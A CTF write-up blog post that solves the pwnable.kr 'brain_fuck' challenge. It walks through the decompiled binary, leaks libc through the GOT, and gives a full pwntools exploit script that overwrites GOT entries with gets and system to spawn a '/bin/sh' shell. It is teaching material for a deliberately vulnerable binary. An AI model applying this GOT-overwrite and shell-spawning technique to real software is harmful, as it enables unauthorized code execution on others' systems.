brain_fuck

最新推荐文章于 2024-04-08 20:49:54 发布
最新推荐文章于 2024-04-08 20:49:54 发布
阅读量578 收藏
点赞数
分类专栏: 逆向分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiuweideqixu/article/details/108183781
版权

 

bss段和got.plt段之间的距离为:A0A0-A030=0x70=112。

main函数

int __cdecl main(int argc, const char **argv, const char **envp)
{
  size_t i; // [esp+28h] [ebp-40Ch]
  char s[1024]; // [esp+2Ch] [ebp-408h]
  unsigned int v6; // [esp+42Ch] [ebp-8h]

  v6 = __readgsdword(0x14u);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  p = (int)tape;
  puts("welcome to brainfuck testing system!!");
  puts("type some brainfuck instructions except [ ]");
  memset(s, 0, 0x400u);
  fgets(s, 1024, stdin);
  for ( i = 0; i < strlen(s); ++i )
    do_brainfuck(s[i]);
  return 0;
}

do_brainfuck函数

int __cdecl do_brainfuck(char a1)
{
  int result; // eax
  _BYTE *v2; // ebx

  result = a1 - 43;
  switch ( a1 )
  {
    case '+':
      result = p;
      ++*(_BYTE *)p;
      break;
    case ',':
      v2 = (_BYTE *)p;
      result = getchar();
      *v2 = result;
      break;
    case '-':
      result = p;
      --*(_BYTE *)p;
      break;
    case '.':
      result = putchar(*(char *)p);
      break;
    case '/':
    case '0':
    case '1':
    case '2':
    case '3':
    case '4':
    case '5':
    case '6':
    case '7':
    case '8':
    case '9':
    case ':':
    case ';':
    case '=':
    case '?':
    case '@':
    case 'A':
    case 'B':
    case 'C':
    case 'D':
    case 'E':
    case 'F':
    case 'G':
    case 'H':
    case 'I':
    case 'J':
    case 'K':
    case 'L':
    case 'M':
    case 'N':
    case 'O':
    case 'P':
    case 'Q':
    case 'R':
    case 'S':
    case 'T':
    case 'U':
    case 'V':
    case 'W':
    case 'X':
    case 'Y':
    case 'Z':
      return result;
    case '<':
      result = p-- - 1;
      break;
    case '>':
      result = p++ + 1;
      break;
    case '[':
      result = puts("[ and ] not supported.");
      break;
  }
  return result;
}

可知,<使得p--,>使得p++,,表示输入一个字符到指针p指向的内存,.表示输出指针p指向的字符。而且,指针p指向的数据只占据一个字节。

由于.got.plt段中保存了各个调用的库函数的绝对地址,所以让p指向地址0x804A030,然后然后可以输出putchar函数的绝对地址。然后可以利用libc中putchar函数的相对地址,今儿计算出libc的基绝对地址地址,这样以来,memset,fgets等各个库函数的绝对地址就可以计算出来了。

got.plt:0804A030 off_804A030     dd offset putchar       ; DATA XREF: _putchar↑r

然后在.got.plt段中对各个函数的地址进行赋写。这样以来,执行putchar函数时,执行的是main函数。执行memset函数时,实际执行的是gets函数,执行fgets函数时,执行的是system函数。

from pwn import *
from zio3 import p32, u32
from struct import pack

context(os='linux', arch='i386', log_level='debug')

p = process('./bf')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')

def main():
    p.recvuntil(']')

    put_char_offset = 0x8048a0a0 - 0x8048a030 # tape到got表的相对地址
    payload = '.'  # 输出指针指向的位置
    payload += '<' * put_char_offset  # 指针put_char_offset减1
    payload += '.>' * 4  # 输出指针位置加4的位置
    payload += '<,' * 4 # write put_char 输入内容到putchar的位置
    payload += '<' * 4  # 指向memset的位置
    payload += ',>' * 4 # write memset 输入内容到memset位置后返回到Putchar
    payload += '<' * (0x2c - 0x10 + 4)  # 指针指向fget的位置
    payload += ',>' * 4 # write fgets 向fget输入后指针位置+4
    payload += '.' * (0x400 - len(payload) - 1)
    p.send(payload)
    p.recv()
    leak = p.recv()[1:]

    log.info('get:' + str(len(leak)))
    log.info('leak:' + hex(u32(leak)))

    putchar_pos = u32(leak) # 根据leak,即putchar_pos可以计算出libc的绝对地址
    libc_base = putchar_pos - libc.symbols['putchar'] # 计算libc_base的绝对地址

    system_addr = libc_base + libc.symbols['system'] # 找出system的绝对地址地址
    gets_addr = libc_base + libc.symbols['gets'] # 找出gets的绝对地址地址
    main_addr = 0x08048671

    log.info("libc base at:" + hex(libc_base))

    packed_gadget_pos = p32(main_addr) # 使用p32可以来回转换。十六进制转换为字节序,字节序转换为十六进制

    # write put char
    for x in (packed_gadget_pos[::-1]): # 从高地址向低地址写:从高位到低位(因为是小端方式存储的)
        p.send(x.to_bytes(1, byteorder='little', signed=False))

    # write memset
    for x in p32(gets_addr):
        p.send(x.to_bytes(1, byteorder='little', signed=False))
    #write fgets
    print(p32(system_addr)) # 输出是:b'P\xd2\xd5\xf7'
    for x in p32(system_addr): # 单个地遍历,x都是int型的
        p.send(x.to_bytes(1, byteorder='little', signed=False))

    p.recvuntil(']')
    payload = '/bin/sh\x00'
    p.send(payload)

    p.interactive()

if __name__ == '__main__':
    main()

 

BUUCTF——面具下的flag
小元砸的博客
03-17 1798
涉及知识点: 1.伪加密 2.brain fuck 3. Ook! 4. linux 7z解压 解题过程: 打开后 用winhex打开发现伪加密 解出的flag.vmdk 在kali里打开 在终端里输入下列命令 7z x flag.vmdk -o./ 得出下列文件 打开key_part_one +++++ +++++ [->++ +++++ +++<] >++.+ +++++ .<+++ [->-- -<]>- -.+++ +++.< ++++[ -&g
CTF总结-杂项篇
qq_42747131的博客
05-07 3170
通用过程 检查文件类型 1.1 通过file命令检查文件类型 1.2 通过binwalk命令检查文件中是否隐藏了其它文件 1.3 如果有,则通过binwalk -e命令分离,如果无法正确分离,则通过foremost进行分离 1.4 如果检查出zlib,说明隐藏了其他文件,此时foremost如果无法正确分离,则可能需要进行手动分离 判断具体题型 2.1 各类隐写 2.2 流量分析 2.3 其他类...
简单的brainfuck解码工具
06-15
简单的brainfuck解码工具,将brainfuck编码输入即可获得明文。
【pwnable.kr】 brainfuck
weixin_30530523的博客
08-03 161
pwnable.kr第二关第一题: ========================================= Download : http://pwnable.kr/bin/bfDownload : http://pwnable.kr/bin/bf_libc.so Running at : nc pwnable.kr 9001 =======================...
Brainfuck
Tiko.T的部落格
04-25 4049
Brainfuck 是一门非常简单甚至可以说是最简单的编程语言,wikipedia。 它的语法由一个8个字符的字符集组成,即&gt;&lt;+=.,[]八个字符。brainfuck的模型还包括一个以字节为单位、被初始化为零的数组、一个指向该数组的指针(初始时指向数组的第一个字节)、以及用于输入输出的两个字节流。 这八个字符每一个都是一条指令: &gt; 指针加一 &lt; ...
【资源总结】Brainfuck
Birdcage
04-21 1285
一开始接触这个语言是……我在查“有哪些有趣的语言”的时候。 虽然现在还没掌握编译原理……希望我有一天也可以成为有趣的技术宅吧? 好了切入正题(没有正题) 一篇比较好的入门介绍 https://gist.github.com/roachhd/dce54bec8ba55fb17d3a 在线编译 https://copy.sh/brainfuck/ 以及最近查资料的时候发现的这个语言的OJ https:...
brainfuck 一览
AdenDeng的专栏
10-21 703
This is My Experience of Using brainfuck for 30 Minutes A Quick Introduction According to wikipedia: “Brainfuck is an esoteric programming language noted for its extreme minimalism. The language
Brain-Fuck:只是一个剧本
03-11
脑干- 只是一个脚本:P 钥匙 描述 , 获得输入字符。 。 打印数据字符。 ` 通过将每个字符的asci代码设置在“图形”下方来获取输入字符串。 < 将头/指针向左移动。 > 向右移动头/指针。...
c语言Brain Fuck语言解释器.zip
最新发布
06-13
《C语言实现BrainFuck语言解释器的深度解析》 BrainFuck是一种极小化的、低级的编程语言,其设计初衷是为了挑战程序员对于简洁和抽象的理解。尽管它在实际开发中并不常用,但作为理解编译原理和解释器构建的基础...
C++/Rust 元编程之 BrainFuck 编译器(constexpr/ 过程宏解法)
Rust语言学习交流
11-08 823
原文地址:C++/Rust 元编程之 BrainFuck 编译器(constexpr/ 过程宏解法)引子接上一篇C++ 元编程之 BrainFuck 编译器(模板元解法)挖了个坑:用co...
Brainfuck:一个简单的 Brainfuck JS 解释器
07-23
脑残 一个简单的 Brainfuck JS 解释器 什么是脑筋急转弯? “Brainfuck 是一种以极简主义着称的深奥编程语言。该语言仅由八个简单的命令和一个指令指针组成。然而,它被证明是图灵完备的。它旨在挑战和娱乐程序员,而不是被制造出来适合实际使用。它由 Urban Müller 于 1993 年创建。该语言的名称是对粗俗术语“brain fuck”的引用,它指的是非常复杂或不寻常的事情,以至于超出了人们的理解范围”( )。 命令是什么? 脑残 C > ++ptr; < --ptr; + ++*ptr; - --*ptr; [ 而 (*ptr) { ] } . putchar(*ptr); , *ptr = getchar();
Brainfuck / OoK 解码脚本
09-25
Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。 在ctf比赛中,有时会碰到需要解brainfuck或ook的情况,一般会使用在线解码网站:https://www.splitbrain.org/services/ook 当在不能接入外网的场景下解题,则需要一个离线脚本。故优化了github上的一个项目完成了该解码脚本,支持brainfuck、ook以及short ook。
手动实现一门图灵完备的编程语言——Brainfuck_构建图灵完备语言
2401_84187563的博客
04-08 1604
brainfuck 是 Urbak Muller 于1993年发明的语言,这门语言可以说是编程语言界的helloworld,它一个值有8个字符,每个有效字符就是一条命令,它就是一门图灵完备的编程语言,如果能理解他的工作原理,那么对于理解图灵机有很大的帮助。字符含义方法指针向右移一forward()指针向左移一backward()当前指针指向的数据带值+1increase()当前指针指向的数据带值-1reduce()将当前指针指向的数据带值的ASCII码打印print()
Brainfuck 编程语言很烧脑?有了它,理解 BF 更简单了
redditnote的博客
04-25 1387
(点击上方公众号,可快速关注)Brainfuck 是一种极小化的计算机编程语言,由 Urban Müller 在 1993 年创建。Müller 的目标是创建一种简单的、...
pwnable.kr - brain fuck
加号减减号的博客
03-06 864
题目简介 分析 writeup 题目简介 Brain fuck 是 pwnable.kr 第二阶段的第一道题,考察了覆些 GOT 表等知识点。题目信息如下: 分析 将下载得到的 bf 文件拖进 IDA 中查看,发现程序主要由 main 函数以及 do_brainfuck 函数组成,且没有开启 PIE。 main 函数如下: int __cdecl main...
给你们介绍个变态编程语言Brainfuck
Slate的专栏
11-14 1242
Brainfuck,是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由於fuck在英語中是髒話,这种语言有时被称为brainf*ck或brainf***,甚至被简称为BF。 Müller的目标是建立一种简单的、可以用最小的编译器来实现的、符合图灵完全思想的编程语言。这种语言由八种状态构成,为Amiga机器编写的编译器(第二版)只有240个字节大小。 就象它的
BrainFuck语言
Become hunger become strong
04-02 1157
百度百科http://baike.baidu.com/link?url=5sBE1Jpel1GfQpzhG7b4289qS0L6rjR96siMvMvGB-ztKlCKete4OFnyuqZE503ULhvalV2_j89zsCDcXKRsb9fmt0RRrIpJ9YOqCQQrn1W Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英
brainfuckbrainfuck在线编解码工具
wandugu的博客
04-01 1万+
Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]https://www.splitbrain.org/services/ook
Brainfuck语言入门
热门推荐
nameofcsdn的博客
11-29 2万+
Brainfuck语言是一种很图灵机的图灵机。 这个编程语言只有8种有效字符,其实就是8种指令: 字符 含义 > 指针加一 < 指针减一 + 指针指向的字节的值加一 - 指针指向的字节的值减一 . 输出指针指向的单元内容(ASCⅡ码)
brain_surf_small.bmp图像下载
07-03
要下载"brain_surf_small.bmp"图像,你可以按照以下步骤进行操作: 1. 打开你的计算机,确保你具有可靠的互联网连接。 2. 在你首选的网页浏览器中打开一个搜索引擎,比如谷歌或百度。 3. 在搜索栏中输入"brain_surf...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值